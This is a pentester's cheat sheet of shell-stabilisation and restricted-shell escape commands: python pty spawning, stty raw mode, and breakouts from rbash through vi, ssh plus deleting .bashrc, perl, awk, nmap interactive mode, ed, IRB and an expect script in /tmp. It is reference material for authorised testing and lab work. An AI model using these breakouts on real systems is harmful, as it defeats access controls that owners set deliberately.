breakouts.txt

# credit: the amazing sirensecurity
# https://sirensecurity.io/blog/break-out-get-that-tty/
 

* Grab a valid tty.
* What OS are you on? Grab access to those binaries fast by exporting each environment variable. Debian/CentOS/FreeBSD
* Want a color terminal to easily tell apart file permissions? Directories? Files?
* Fastest way to list out the files in a directory, show size, show permissions, human readable.
* Make this shell stable.


--- PYTHON3 
python -c 'import pty; pty.spawn("/bin/bash")'
# (follow below steps)

--- PYTHON3 
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color ; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
alias ll='ls -lsaht --color=auto'

# Ctrl + Z to background the process
stty raw -echo ; fg ; reset ; stty columns 200 rows 200
# Return key



--- RESTRICTED BASH (PT1)

Is this rbash (Restricted Bash)? PT1
$ vi
:set shell=/bin/sh
:shell

$ vim
:set shell=/bin/sh
:shell

--- RESTRICTED BASH (PT2)
Is this rbash (Restricted Bash)? PT2
(This requires ssh user-level access)

ssh user@127.0.0.1 "/bin/sh"
rm $HOME/.bashrc
exit
ssh user@127.0.0.1
(Bash Shell)

Is python present on the target machine?
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

--- PERL

Is perl present on the target machine?
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'

--- AWK

Is AWK present on the target machine?
awk 'BEGIN {system("/bin/bash -i")}'
awk 'BEGIN {system("/bin/sh -i")}'


--- NMAP

Is Nmap present on the target machine?
nmap --interactive
nmap> !sh


--- MISC

# ed
ed
!sh

# IRB
IRB Present on the target machine?
exec "/bin/sh"

# Expect:

expect -v
  expect version 5.45.4
  
$ cat > /tmp/shell.sh <<EOF
#!/usr/bin/expect
spawn bash
interact
EOF

$ chmod u+x /tmp/shell.sh
$ /tmp/shell.sh